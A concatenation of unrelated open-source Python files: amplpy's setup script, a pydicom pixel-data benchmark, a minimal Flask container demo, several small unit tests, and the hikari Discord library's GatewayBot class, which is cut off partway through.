solver interaction is handled directly by AMPL, which leads to great stability
and speed; the library just acts as an intermediary, and the added overhead
(in terms of memory and CPU usage) depends mostly on how much data is read
back from AMPL, the size of the model as such is irrelevant. Functions for
directly assigning data to AMPL parameters and sets are provided, which can
be used instead of the normal AMPL data reading procedures. AMPL API has been
written with usability in mind, and it is easy to access its functionalities
from C++, Java, C#, MATLAB, R and Python.
The AMPL API can function as an add-on to any existing AMPL installation. If
you do not yet have an AMPL installation on the computer where you will be
working with the API, see our
`demo page <http://ampl.com/try-ampl/download-a-free-demo/>`_
or
`trial page <http://ampl.com/try-ampl/request-a-full-trial/>`_
to download a working version that can be installed quickly.
Documentation:
``````````````
* http://amplpy.readthedocs.io
* http://ampl.com/api/nightly/python/
Repositories:
`````````````
* GitHub Repository: https://github.com/ampl/amplpy
* PyPI Repository: https://pypi.python.org/pypi/amplpy
"""
from setuptools import setup, Extension
import platform
import os
OSTYPE = platform.system()
x64 = platform.architecture()[0] == '64bit'
def ls_dir(base_dir):
"""List files recursively."""
return [
os.path.join(dirpath.replace(base_dir, '', 1), f)
for (dirpath, dirnames, files) in os.walk(base_dir)
for f in files
]
def make_relative_rpath(path):
if OSTYPE == 'Darwin':
return '-Wl,-rpath,@loader_path/' + path
elif OSTYPE == 'Linux':
return '-Wl,-rpath,$ORIGIN/' + path
else:
return ''
def compile_args():
if OSTYPE == 'Windows':
return ['/TP /EHsc']
elif OSTYPE == 'Linux':
return ['-std=c++11']
else:
return []
libdir = 'lib64' if x64 else 'lib32'
setup(
name='amplpy',
version='0.6.7',
description='Python API for AMPL',
long_description=__doc__,
license='BSD-3',
platforms='any',
author='Filipe Brandão',
author_email='fdabrandao@ampl.com',
url='http://ampl.com/',
download_url='https://github.com/ampl/amplpy',
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Console',
'Topic :: Software Development',
'Topic :: Scientific/Engineering',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: BSD License',
'Operating System :: POSIX',
'Operating System :: Unix',
'Operating System :: MacOS',
'Operating System :: Microsoft :: Windows',
'Programming Language :: C++',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: Implementation :: CPython',
],
packages=['amplpy'],
ext_modules=[Extension(
'_amplpython',
libraries=['ampl'],
library_dirs=[os.path.join('amplpy', 'amplpython', libdir)],
include_dirs=[os.path.join('amplpy', 'amplpython', 'include')],
extra_compile_args=compile_args(),
extra_link_args=[
make_relative_rpath(os.path.join('amplpy', 'amplpython', libdir))
],
sources=[
os.path.join('amplpy', 'amplpython', 'amplpythonPYTHON_wrap.cxx')
],
)],
package_data={'': ls_dir('amplpy/')},
install_requires=['future >= 0.15.0']
)
|
# Copyright 2008-2018 pydicom authors. See LICENSE file for details.
"""Benchmarks for the numpy_handler module.
Requires asv and numpy.
"""
from platform import python_implementation
from tempfile import TemporaryFile
import numpy as np
from pydicom import dcmread
from pydicom.data import get_testdata_file
from pydicom.dataset import Dataset, FileMetaDataset
from pydicom.pixel_data_handlers.numpy_handler import get_pixeldata
from pydicom.uid import ExplicitVRLittleEndian, generate_uid
# 1/1, 1 sample/pixel, 1 frame
EXPL_1_1_1F = get_testdata_file("liver_1frame.dcm")
# 1/1, 1 sample/pixel, 3 frame
EXPL_1_1_3F = get_testdata_file("liver.dcm")
# 8/8, 1 sample/pixel, 1 frame
EXPL_8_1_1F = get_testdata_file("OBXXXX1A.dcm")
# 8/8, 1 sample/pixel, 2 frame
EXPL_8_1_2F = get_testdata_file("OBXXXX1A_2frame.dcm")
# 8/8, 3 sample/pixel, 1 frame
EXPL_8_3_1F = get_testdata_file("SC_rgb.dcm")
# 8/8, 3 sample/pixel, 1 frame, YBR_FULL_422
EXPL_8_3_1F_YBR422 = get_testdata_file('SC_ybr_full_422_uncompressed.dcm')
# 8/8, 3 sample/pixel, 2 frame
EXPL_8_3_2F = get_testdata_file("SC_rgb_2frame.dcm")
# 16/16, 1 sample/pixel, 1 frame
EXPL_16_1_1F = get_testdata_file("MR_small.dcm")
# 16/12, 1 sample/pixel, 10 frame
EXPL_16_1_10F = get_testdata_file("emri_small.dcm")
# 16/16, 3 sample/pixel, 1 frame
EXPL_16_3_1F = get_testdata_file("SC_rgb_16bit.dcm")
# 16/16, 3 sample/pixel, 2 frame
EXPL_16_3_2F = get_testdata_file("SC_rgb_16bit_2frame.dcm")
# 32/32, 1 sample/pixel, 1 frame
IMPL_32_1_1F = get_testdata_file("rtdose_1frame.dcm")
# 32/32, 1 sample/pixel, 15 frame
IMPL_32_1_15F = get_testdata_file("rtdose.dcm")
# 32/32, 3 sample/pixel, 1 frame
EXPL_32_3_1F = get_testdata_file("SC_rgb_32bit.dcm")
# 32/32, 3 sample/pixel, 2 frame
EXPL_32_3_2F = get_testdata_file("SC_rgb_32bit_2frame.dcm")
def _create_temporary_dataset(shape=(100, 1024, 1024, 3), bit_depth=16):
"""Function to create a temporary dataset for use in testing.
Parameters
----------
shape : 4-tuple
The (frames, rows, columns, channels) of the test dataset.
bit_depth : int
The BitsAllocated value to use for the dataset, one of 8, 16, 32, 64.
Returns
-------
tempfile.TemporaryFile
A created DICOM File Format conformant dataset.
"""
ds = Dataset()
ds.is_little_endian = True
ds.is_implicit_VR = False
ds.file_meta = FileMetaDataset()
ds.file_meta.TransferSyntaxUID = ExplicitVRLittleEndian
ds.SOPClassUID = '1.2.3.4'
ds.SOPInstanceUID = generate_uid()
ds.BitsAllocated = bit_depth
ds.PixelRepresentation = 0
ds.PlanarConfiguration = 0
ds.Rows = shape[1]
ds.Columns = shape[2]
ds.NumberOfFrames = shape[0]
ds.SamplesPerPixel = shape[3]
if shape[3] == 1:
ds.PhotometricInterpretation = 'MONOCHROME2'
elif shape[3] == 3:
ds.PhotometricInterpretation = 'RGB'
arr = np.zeros(shape, dtype='uint{}'.format(bit_depth))
ds.PixelData = arr.tobytes()
if len(ds.PixelData) % 2:
ds.PixelData += b'\x00'
tfile = TemporaryFile(mode='w+b')
ds.save_as(tfile, write_like_original=False)
tfile.seek(0)
return tfile
class TimeGetPixelData_LargeDataset:
"""Time tests for numpy_handler.get_pixeldata with large datasets."""
def setup(self):
"""Setup the tests."""
self.no_runs = 100
self.ds_16_3_100 = dcmread(_create_temporary_dataset())
def time_large_dataset(self):
"""Time reading pixel data from a large dataset."""
for ii in range(self.no_runs):
get_pixeldata(self.ds_16_3_100)
class TimeGetPixelData:
"""Time tests for numpy_handler.get_pixeldata."""
def setup(self):
"""Setup the tests."""
self.no_runs = 100
self.ds_1_1_1 = dcmread(EXPL_1_1_1F)
self.ds_1_1_3 = dcmread(EXPL_1_1_3F)
self.ds_8_1_1 = dcmread(EXPL_8_1_1F)
self.ds_8_1_2 = dcmread(EXPL_8_1_2F)
self.ds_8_3_1 = dcmread(EXPL_8_3_1F)
self.ds_8_3_2 = dcmread(EXPL_8_3_2F)
self.ds_16_1_1 = dcmread(EXPL_16_1_1F)
self.ds_16_1_10 = dcmread(EXPL_16_1_10F)
self.ds_16_3_1 = dcmread(EXPL_16_3_1F)
self.ds_16_3_2 = dcmread(EXPL_16_3_2F)
self.ds_32_1_1 = dcmread(IMPL_32_1_1F)
self.ds_32_1_15 = dcmread(IMPL_32_1_15F)
self.ds_32_3_1 = dcmread(EXPL_32_3_1F)
self.ds_32_3_2 = dcmread(EXPL_32_3_2F)
self.ds_ybr_422 = dcmread(EXPL_8_3_1F_YBR422)
def time_1bit_1sample_1frame(self):
"""Time retrieval of 1-bit, 1 sample/pixel, 1 frame."""
no_runs = self.no_runs
if 'PyPy' in python_implementation():
no_runs = 1
for ii in range(no_runs):
get_pixeldata(self.ds_1_1_1)
def time_1bit_1sample_3frame(self):
"""Time retrieval of 1-bit, 1 sample/pixel, 3 frame."""
no_runs = self.no_runs
if 'PyPy' in python_implementation():
no_runs = 1
for ii in range(no_runs):
get_pixeldata(self.ds_1_1_3)
def time_8bit_1sample_1frame(self):
"""Time retrieval of 8-bit, 1 sample/pixel, 1 frame."""
for ii in range(self.no_runs):
get_pixeldata(self.ds_8_1_1)
def time_8bit_1sample_2frame(self):
"""Time retrieval of 8-bit, 1 sample/pixel, 2 frame."""
for ii in range(self.no_runs):
get_pixeldata(self.ds_8_1_2)
def time_8bit_3sample_1frame(self):
"""Time retrieval of 8-bit, 3 sample/pixel, 1 frame."""
for ii in range(self.no_runs):
get_pixeldata(self.ds_8_3_1)
def time_8bit_3sample_2frame(self):
"""Time retrieval of 8-bit, 3 sample/pixel, 2 frame."""
for ii in range(self.no_runs):
get_pixeldata(self.ds_8_3_2)
def time_16bit_1sample_1frame(self):
"""Time retrieval of 16-bit, 1 sample/pixel, 1 frame."""
for ii in range(self.no_runs):
get_pixeldata(self.ds_16_1_1)
def time_16bit_1sample_10frame(self):
"""Time retrieval of 16-bit, 1 sample/pixel, 10 frame."""
for ii in range(self.no_runs):
get_pixeldata(self.ds_16_1_10)
def time_16bit_3sample_1frame(self):
"""Time retrieval of 16-bit, 3 sample/pixel, 1 frame."""
for ii in range(self.no_runs):
get_pixeldata(self.ds_16_3_1)
def time_16bit_3sample_2frame(self):
"""Time retrieval of 16-bit, 3 sample/pixel, 2 frame."""
for ii in range(self.no_runs):
get_pixeldata(self.ds_16_3_2)
def time_32bit_1sample_1frame(self):
"""Time retrieval of 32-bit, 1 sample/pixel, 1 frame."""
for ii in range(self.no_runs):
get_pixeldata(self.ds_32_1_1)
def time_32bit_1sample_15frame(self):
"""Time retrieval of 32-bit, 1 sample/pixel, 15 frame."""
for ii in range(self.no_runs):
get_pixeldata(self.ds_32_1_15)
def time_32bit_3sample_1frame(self):
"""Time retrieval of 32-bit, 3 sample/pixel, 1 frame."""
for ii in range(self.no_runs):
get_pixeldata(self.ds_32_3_1)
def time_32bit_3sample_2frame(self):
"""Time retrieval of 32-bit, 3 sample/pixel, 2 frame."""
for ii in range(self.no_runs):
get_pixeldata(self.ds_32_3_2)
def time_ybr_422(self):
"""Time retrieval of YBR_FULL_422 data."""
for ii in range(self.no_runs):
get_pixeldata(self.ds_ybr_422)
|
# Copyright 2018 Cisco Systems, Inc.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import socket
from flask import Flask, request
app = Flask(__name__)
@app.route("/", methods=["GET", "POST"])
def hello():
print request.data
return "Hello Container World! My hostname is {}.\n".format(socket.gethostname())
|
import pyaf.Bench.TS_datasets as tsds
import pyaf.tests.artificial.process_artificial_dataset as art
art.process_dataset(N = 128 , FREQ = 'D', seed = 0, trendtype = "Lag1Trend", cycle_length = 12, transform = "RelativeDifference", sigma = 0.0, exog_count = 0, ar_order = 12);
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from whats import whats
def test_tellme():
assert whats.tellme('美妙的新世界')
|
# pylint: disable=redefined-builtin
# pylint: disable=too-many-arguments
"""Test related method and functionality of Context."""
import pytest
import responses
from decanter.core import Context
from decanter.core.core_api import TrainInput
from decanter.core.extra import CoreStatus
from decanter.core.jobs import DataUpload
fail_conds = [(stat, res) for stat in CoreStatus.FAIL_STATUS for res in [None, 'result']]
fail_conds.append((CoreStatus.DONE, None))
@responses.activate
def test_data_success(
globals, client, mock_test_responses, context_fixture):
"""DataUpload gets the id and result when upload csv file or datafram."""
context = context_fixture('Healthy')
mock_test_responses(task='upload', status=CoreStatus.DONE)
data = client.upload(file=globals['test_csv_file'])
data_ = client.upload(file=globals['test_df'])
context.run()
assert data.task.id == data_.task.id == globals['upload']
assert data.id == data_.id == globals['data']
assert data.status == data_.status == CoreStatus.DONE
assert data.result == data_.result == globals['results']['upload']
@responses.activate
@pytest.mark.parametrize('status, result', fail_conds)
def test_data_fail(
globals, client, status, result, mock_test_responses, context_fixture):
"""DataUpload fails when status and result create fail conditions."""
context = context_fixture('Healthy')
mock_test_responses(task='upload', status=status, task_result=result)
data = client.upload(file=globals['test_csv_file'])
context.run()
assert data.task.id == globals['upload']
assert data.id is None
assert data.status == status
assert data.result == result
@responses.activate
def test_no_file(client, mock_test_responses, context_fixture):
"""Raise exceptions when upload empty files."""
context_fixture('Healthy')
mock_test_responses(task='upload')
with pytest.raises(Exception):
client.upload(file=None)
@responses.activate
@pytest.mark.parametrize('status', [CoreStatus.PENDING, CoreStatus.RUNNING, CoreStatus.FAIL])
def test_data_stop(
globals, urls, client, status, mock_test_responses, context_fixture):
"""DataUpload status is fail if stopped during pending, running, and fail status,
remains if in done status. The experiment following will failed if data
failed.
"""
async def cancel(data):
data.stop()
return
context = context_fixture('Healthy')
mock_test_responses(task='upload', status=status)
mock_test_responses(task='train', status=CoreStatus.DONE)
responses.add(
responses.PUT, urls('stop', 'upload'),
json={
'message': 'task removed'
},
status=200,
content_type='application/json')
if status == CoreStatus.DONE:
data = DataUpload()
data.status = CoreStatus.DONE
else:
data = client.upload(file=globals['test_csv_file'])
exp = client.train(TrainInput(
data=data, target='test-target', algos=['test-algo']))
cancel_task = Context.LOOP.create_task(cancel(data))
Context.CORO_TASKS.append(cancel_task)
context.run()
if status == CoreStatus.DONE:
assert data.status == CoreStatus.DONE
assert exp.status == CoreStatus.DONE
else:
assert data.status == CoreStatus.FAIL
assert exp.status == CoreStatus.FAIL
|
# -*- coding: utf-8 -*-
# cython: language_level=3
# Copyright (c) 2020 Nekokatt
# Copyright (c) 2021-present davfsa
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""Basic implementation the components for a single-process bot."""
from __future__ import annotations
__all__: typing.List[str] = ["GatewayBot"]
import asyncio
import datetime
import logging
import math
import signal
import sys
import threading
import traceback
import types
import typing
import warnings
from hikari import applications
from hikari import errors
from hikari import intents as intents_
from hikari import presences
from hikari import snowflakes
from hikari import traits
from hikari import undefined
from hikari.impl import cache as cache_impl
from hikari.impl import config as config_impl
from hikari.impl import entity_factory as entity_factory_impl
from hikari.impl import event_factory as event_factory_impl
from hikari.impl import event_manager as event_manager_impl
from hikari.impl import rest as rest_impl
from hikari.impl import shard as shard_impl
from hikari.impl import voice as voice_impl
from hikari.internal import aio
from hikari.internal import time
from hikari.internal import ux
if typing.TYPE_CHECKING:
import concurrent.futures
from hikari import channels
from hikari import guilds
from hikari import users as users_
from hikari.api import cache as cache_
from hikari.api import entity_factory as entity_factory_
from hikari.api import event_factory as event_factory_
from hikari.api import event_manager as event_manager_
from hikari.api import rest as rest_
from hikari.api import shard as gateway_shard
from hikari.api import voice as voice_
_LOGGER: typing.Final[logging.Logger] = logging.getLogger("hikari.bot")
async def _gather(coros: typing.Iterator[typing.Awaitable[typing.Any]]) -> None:
# Calling asyncio.gather outside of a running event loop isn't safe and
# will lead to RuntimeErrors in later versions of python, so this call is
# kept within a coroutine function.
await asyncio.gather(*coros)
def _destroy_loop(loop: asyncio.AbstractEventLoop) -> None:
async def murder(future: asyncio.Future[typing.Any]) -> None:
# These include _GatheringFuture which must be awaited if the children
# throw an asyncio.CancelledError, otherwise it will spam logs with warnings
# about exceptions not being retrieved before GC.
try:
_LOGGER.log(ux.TRACE, "killing %s", future)
future.cancel()
await future
except asyncio.CancelledError:
pass
except Exception as ex:
loop.call_exception_handler(
{
"message": "Future raised unexpected exception after requesting cancellation",
"exception": ex,
"future": future,
}
)
remaining_tasks = [t for t in asyncio.all_tasks(loop) if not t.done()]
if remaining_tasks:
_LOGGER.debug("terminating %s remaining tasks forcefully", len(remaining_tasks))
loop.run_until_complete(_gather((murder(task) for task in remaining_tasks)))
else:
_LOGGER.debug("No remaining tasks exist, good job!")
if sys.version_info >= (3, 9):
_LOGGER.debug("shutting down default executor")
try:
# This seems to raise a NotImplementedError when running with uvloop.
loop.run_until_complete(loop.shutdown_default_executor())
except NotImplementedError:
pass
_LOGGER.debug("shutting down asyncgens")
loop.run_until_complete(loop.shutdown_asyncgens())
_LOGGER.debug("closing event loop")
loop.close()
# Closed loops cannot be re-used so it should also be un-set.
asyncio.set_event_loop(None)
def _validate_activity(activity: undefined.UndefinedNoneOr[presences.Activity]) -> None:
# This seems to cause confusion for a lot of people, so lets add some warnings into the mix.
if activity is undefined.UNDEFINED or activity is None:
return
# If you ever change where this is called from, make sure to check the stacklevels are correct
# or the code preview in the warning will be wrong...
if activity.type is presences.ActivityType.CUSTOM:
warnings.warn(
"The CUSTOM activity type is not supported by bots at the time of writing, and may therefore not have "
"any effect if used.",
category=errors.HikariWarning,
stacklevel=3,
)
elif activity.type is presences.ActivityType.STREAMING and activity.url is None:
warnings.warn(
"The STREAMING activity type requires a 'url' parameter pointing to a valid Twitch or YouTube video "
"URL to be specified on the activity for the presence update to have any effect.",
category=errors.HikariWarning,
stacklevel=3,
)
class GatewayBot(traits.GatewayBotAware):
"""Basic auto-sharding bot implementation.
This is the class you will want to use to start, control, and build a bot
with.
Parameters
----------
token : builtins.str
The bot token to sign in with.
Other Parameters
----------------
allow_color : builtins.bool
Defaulting to `builtins.True`, this will enable coloured console logs
on any platform that is a TTY.
Setting a `"CLICOLOR"` environment variable to any **non `0`** value
will override this setting.
Users should consider this an advice to the application on whether it is
safe to show colours if possible or not. Since some terminals can be
awkward or not support features in a standard way, the option to
explicitly disable this is provided. See `force_color` for an
alternative.
banner : typing.Optional[builtins.str]
The package to search for a `banner.txt` in. Defaults to `"hikari"` for
the `"hikari/banner.txt"` banner.
Setting this to `builtins.None` will disable the banner being shown.
executor : typing.Optional[concurrent.futures.Executor]
Defaults to `builtins.None`. If non-`builtins.None`, then this executor
is used instead of the `concurrent.futures.ThreadPoolExecutor` attached
to the `asyncio.AbstractEventLoop` that the bot will run on. This
executor is used primarily for file-IO.
While mainly supporting the `concurrent.futures.ThreadPoolExecutor`
implementation in the standard lib, Hikari's file handling systems
should also work with `concurrent.futures.ProcessPoolExecutor`, which
relies on all objects used in IPC to be `pickle`able. Many third-party
libraries will not support this fully though, so your mileage may vary
on using ProcessPoolExecutor implementations with this parameter.
force_color : builtins.bool
Defaults to `builtins.False`. If `builtins.True`, then this application
will __force__ colour to be used in console-based output. Specifying a
`"CLICOLOR_FORCE"` environment variable with a non-`"0"` value will
override this setting.
cache_settings : typing.Optional[hikari.impl.config.CacheSettings]
Optional cache settings. If unspecified, will use the defaults.
http_settings : typing.Optional[hikari.impl.config.HTTPSettings]
Optional custom HTTP configuration settings to use. Allows you to
customise functionality such as whether SSL-verification is enabled,
what timeouts `aiohttp` should expect to use for requests, and behavior
regarding HTTP-redirects.
intents : hikari.intents.Intents
Defaults to `hikari.intents.Intents.ALL_UNPRIVILEGED`. This allows you
to change which intents your application will use on the gateway. This
can be used to control and change the types of events you will receive.
logs : typing.Union[builtins.None, LoggerLevel, typing.Dict[str, typing.Any]]
Defaults to `"INFO"`.
If `builtins.None`, then the Python logging system is left uninitialized
on startup, and you will need to configure it manually to view most
logs that are output by components of this library.
If one of the valid values in a `LoggerLevel`, then this will match a
call to `colorlog.basicConfig` (a facade for `logging.basicConfig` with
additional conduit for enabling coloured logging levels) with the
`level` kwarg matching this value.
If a `typing.Dict[str, typing.Any]` equivalent, then this value is
passed to `logging.config.dictConfig` to allow the user to provide a
specialized logging configuration of their choice. If any handlers are
defined in the dict, default handlers will not be setup.
As a side note, you can always opt to leave this on the default value
and then use an incremental `logging.config.dictConfig` that applies
any additional changes on top of the base configuration, if you prefer.
An example of can be found in the `Example` section.
Note that `"TRACE_HIKARI"` is a library-specific logging level
which is expected to be more verbose than `"DEBUG"`.
max_rate_limit : builtins.float
The max number of seconds to backoff for when rate limited. Anything
greater than this will instead raise an error.
This defaults to five minutes if left to the default value. This is to
stop potentially indefinitely waiting on an endpoint, which is almost
never what you want to do if giving a response to a user.
You can set this to `float("inf")` to disable this check entirely.
Note that this only applies to the REST API component that communicates
with Discord, and will not affect sharding or third party HTTP endpoints
that may be in use.
max_retries : typing.Optional[builtins.int]
Maximum number of times a request will be retried if
it fails with a `5xx` status. Defaults to 3 if set to `builtins.None`.
proxy_settings : typing.Optional[hikari.impl.config.ProxySettings]
Custom proxy settings to use with network-layer logic
in your application to get through an HTTP-proxy.
rest_url : typing.Optional[builtins.str]
Defaults to the Discord REST API URL if `builtins.None`. Can be
overridden if you are attempting to point to an unofficial endpoint, or
if you are attempting to mock/stub the Discord API for any reason.
Generally you do not want to change this.
!!! note
`force_color` will always take precedence over `allow_color`.
!!! note
Settings that control the gateway session are provided to the
`GatewayBot.run` and `GatewayBot.start` functions in this class. This is done
to allow you to contextually customise details such as sharding
configuration without having to re-initialize the entire application
each time.
Example
-------
Setting up logging using a dictionary configuration:
```py
import os
import hikari
# We want to make gateway logs output as DEBUG, and TRACE for all ratelimit content.
bot = hikari.GatewayBot(
token=os.environ["BOT_TOKEN"],
logs={
"version": 1,
"incremental": True,
"loggers": {
"hikari.gateway": {"level": "DEBUG"},
"hikari.ratelimits": {"level": "TRACE_HIKARI"},
},
},
)
```
"""
__slots__: typing.Sequence[str] = (
"_cache",
"_closing_event",
"_closed_event",
"_entity_factory",
"_event_manager",
"_event_factory",
"_executor",
"_http_settings",
"_intents",
"_is_alive",
"_proxy_settings",
"_rest",
"_shards",
"_token",
"_voice",
"shards",
)
def __init__(
self,
token: str,
*,
allow_color: bool = True,
banner: typing.Optional[str] = "hikari",
executor: typing.Optional[concurrent.futures.Executor] = None,
force_color: bool = False,
cache_settings: typing.Optional[config_impl.CacheSettings] = None,
http_settings: typing.Optional[config_impl.HTTPSettings] = None,
intents: intents_.Intents = intents_.Intents.ALL_UNPRIVILEGED,
logs: typing.Union[None, int, str, typing.Dict[str, typing.Any]] = "INFO",
max_rate_limit: float = 300,
max_retries: int = 3,
proxy_settings: typing.Optional[config_impl.ProxySettings] = None,
rest_url: typing.Optional[str] = None,
) -> None:
# Beautification and logging
ux.init_logging(logs, allow_color, force_color)
self.print_banner(banner, allow_color, force_color)
# Settings and state
self._closing_event: typing.Optional[asyncio.Event] = None
self._closed_event: typing.Optional[asyncio.Event] = None
self._is_alive = False
self._executor = executor
self._http_settings = http_settings if http_settings is not None else config_impl.HTTPSettings()
self._intents = intents
self._proxy_settings = proxy_settings if proxy_settings is not None else config_impl.ProxySettings()
self._token = token.strip()
# Caching
cache_settings = cache_settings if cache_settings is not None else config_impl.CacheSettings()
self._cache = cache_impl.CacheImpl(self, cache_settings)
# Entity creation
self._entity_factory = entity_factory_impl.EntityFactoryImpl(self)
# Event creation
self._event_factory = event_factory_impl.EventFactoryImpl(self)
# Event handling
self._event_manager = event_manager_impl.EventManagerImpl(self._event_factory, self._intents, cache=self._cache)
# Voice subsystem
self._voice = voice_impl.VoiceComponentImpl(self)
# RESTful API.
self._rest = rest_impl.RESTClientImpl(
cache=self._cache,
entity_factory=self._entity_factory,
executor=self._executor,
http_settings=self._http_settings,
max_rate_limit=max_rate_limit,
proxy_settings=self._proxy_settings,
rest_url=rest_url,
max_retries=max_retries,
token=token,
token_type=applications.TokenType.BOT,
)
# We populate these on startup instead, as we need to possibly make some
# HTTP requests to determine what to put in this mapping.
self._shards: typing.Dict[int, gateway_shard.GatewayShard] = {}
self.shards: typing.Mapping[int, gateway_shard.GatewayShard] = types.MappingProxyType(self._shards)
@property
def cache(self) -> cache_.Cache:
return self._cache
@property
def event_manager(self) -> event_manager_.EventManager:
return self._event_manager
@property
def entity_factory(self) -> entity_factory_.EntityFactory:
return self._entity_factory
@property
def event_factory(self) -> event_factory_.EventFactory:
return self._event_factory
@property
def executor(self) -> typing.Optional[concurrent.futures.Executor]:
return self._executor
@property
def heartbeat_latencies(self) -> typing.Mapping[int, float]:
return {s.id: s.heartbeat_latency for s in self._shards.values()}
@property
def heartbeat_latency(self) -> float:
latencies = [s.heartbeat_latency for s in self._shards.values() if not math.isnan(s.heartbeat_latency)]
return sum(latencies) / len(latencies) if latencies else float("nan")
@property
def http_settings(self) -> config_impl.HTTPSettings:
return self._http_settings
@property
def intents(self) -> intents_.Intents:
return self._intents
@property
def proxy_settings(self) -> config_impl.ProxySettings:
return self._proxy_settings
@property
def shard_count(self) -> int:
return next(iter(self._shards.values())).shard_count if self._shards else 0
@property
def voice(self) -> voice_.VoiceComponent:
return self._voice
@property
def rest(self) -> rest_.RESTClient:
return self._rest
@property
def is_alive(self) -> bool:
return self._is_alive
def _check_if_alive(self) -> None:
if not self._is_alive:
raise errors.ComponentStateConflictError("bot is not running so it cannot be interacted with")
def get_me(self) -> typing.Optional[users_.OwnUser]:
return self._cache.get_me()
async def close(self) -> None:
self._check_if_alive()
await self._close()
async def _close(self) -> None:
if self._closed_event: # Closing is in progress from another call, wait for that to complete.
await self._closed_event.wait()
return
if self._closing_event is None: # If closing event is None then this is already closed.
return
_LOGGER.debug("bot requested to shutdown")
self._closed_event = asyncio.Event()
self._closing_event.set()
self._closing_event = None
dispatch_events = self._is_alive
loop = asyncio.get_running_loop()
async def handle(name: str, awaitable: typing.Awaitable[typing.Any]) -> None:
future = asyncio.ensure_future(awaitable)
try:
await future
except Exception as ex:
loop.call_exception_handler(
{
"message": f"{name} raised an exception during shutdown",
"future": future,
"exception": ex,
}
)
if dispatch_events:
await self._event_manager.dispatch(self._event_factory.deserialize_stopping_event())
_LOGGER.log(ux.TRACE, "StoppingEvent dispatch completed, now beginning termination")
calls = [
("rest", self._rest.close()),
("voice handler", self._voice.close()),
*((f"shard {s.id}", s.close()) for s in self._shards.values()),
]
for coro in asyncio.as_completed([handle(*pair) for pair in calls]):
await coro
# Clear out cache and shard map
self._cache.clear()
self._shards.clear()
self._is_alive = False
if dispatch_events:
await self._event_manager.dispatch(self._event_factory.deserialize_stopped_event())
self._closed_event.set()
self._closed_event = None
def dispatch(self, event: event_manager_.EventT_inv) -> asyncio.Future[typing.Any]:
"""Dispatch an event.
Parameters
----------
event : hikari.events.base_events.Event
The event to dispatch.
Example
-------
We can dispatch custom events by first defining a class that
derives from `hikari.events.base_events.Event`.
```py
import attr
from hikari.traits import RESTAware
from hikari.events.base_events import Event
from hikari.users import User
from hikari.snowflakes import Snowflake
@attr.define()
class EveryoneMentionedEvent(Event):
app: RESTAware = attr.field()
author: User = attr.field()
'''The user who mentioned everyone.'''
content: str = attr.field()
'''The message that was sent.'''
message_id: Snowflake = attr.field()
'''The message ID.'''
channel_id: Snowflake = attr.field()
'''The channel ID.'''
```
We can then dispatch our event as we see fit.
```py
from hikari.events.messages import MessageCreateEvent
@bot.listen(MessageCreateEvent)
async def on_message(event):
if "@everyone" in event.content or "@here" in event.content:
event = EveryoneMentionedEvent(
author=event.author,
content=event.content,
message_id=event.id,
channel_id=event.channel_id,
)
bot.dispatch(event)
```
This event can be listened to elsewhere by subscribing to it with
`EventManager.subscribe`.
```py
@bot.listen(EveryoneMentionedEvent)
async def on_everyone_mentioned(event):
print(event.user, "just pinged everyone in", event.channel_id)
```
Returns
-------
asyncio.Future[typing.Any]
A future that can be optionally awaited. If awaited, the future
will complete once all corresponding event listeners have been
invoked. If not awaited, this will schedule the dispatch of the
events in the background for later.
See Also
--------
Listen: `hikari.impl.bot.GatewayBot.listen`
Stream: `hikari.impl.bot.GatewayBot.stream`
Subscribe: `hikari.impl.bot.GatewayBot.subscribe`
Unsubscribe: `hikari.impl.bot.GatewayBot.unsubscribe`
Wait_for: `hikari.impl.bot.GatewayBot.wait_for`
"""
return self._event_manager.dispatch(event)
def get_listeners(
self, event_type: typing.Type[event_manager_.EventT_co], /, *, polymorphic: bool = True
) -> typing.Collection[event_manager_.CallbackT[event_manager_.EventT_co]]:
"""Get the listeners for a given event type, if there are any.
Parameters
----------
event_type : typing.Type[T]
The event type to look for.
`T` must be a subclass of `hikari.events.base_events.Event`.
polymorphic : builtins.bool
If `builtins.True`, this will also return the listeners of the
subclasses of the given event type. If `builtins.False`, then
only listeners for this class specifically are returned. The
default is `builtins.True`.
Returns
-------
typing.Collection[typing.Callable[[T], typing.Coroutine[typing.Any, typing.Any, builtins.None]]
A copy of the collection of listeners for the event. Will return
an empty collection if nothing is registered.
`T` must be a subclass of `hikari.events.base_events.Event`.
"""
return self._event_manager.get_listeners(event_type, polymorphic=polymorphic)
async def join(self, until_close: bool = True) -> None:
self._check_if_alive()
awaitables: typing.List[typing.Awaitable[typing.Any]] = [s.join() for s in self._shards.values()]
if until_close and self._closing_event: # If closing event is None then this is already closing.
awaitables.append(self._closing_event.wait())
await aio.first_completed(*awaitables)
def listen(
